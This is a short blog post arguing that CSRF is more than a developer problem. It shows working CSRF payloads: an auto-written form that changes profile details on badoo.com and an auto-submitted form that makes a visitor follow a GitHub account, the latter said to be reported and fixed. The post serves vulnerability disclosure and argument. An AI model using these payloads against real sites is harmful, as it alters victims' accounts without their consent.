Remark: Post is published on April 2(but was expected yesterday) coz Berlin haz no free wifi cause I'm not joking and I figured out that Sunday is the worst day for urgent updates. Well, who cares the date, enjoy:
TL;DR:
I'm trying hard to prove my point that statement "CSRF is only the developers' problem" is not true. I provided some examples and I want you to check them out. I really appreciate any viewpoint at this problem. Thank you for your attention in advance!
Quick overview:
showcase:
document.write('<form action="http://badoo.com/ws/anketa-ws.phtml?ws=1" method=post> <input name="name" value="SUUUUP"><input name="fname" value="SUUUUP"><input name="sname" value="SUUUUP"><input name="birth_day" value="28"><input name="birth_month" value="01"><input name="section" value="basic"><input name="birth_year" value="1991"> </form>')
description:
e.g. changing your profile details. No protection at all.
showcase:
<script>
document.write('<form target=ifr name=pwn method=post action="https://github.com/users/follow?target=homakov"></form>')
pwn.submit()
</script>
description:
makes you follow certain account without your confirmation. reported few weeks ago and fixed.
showcase:
description:
deleting presentation via GET. commenting w/o confirmation. GET following etc
Read more: Egor Homakov
QR: 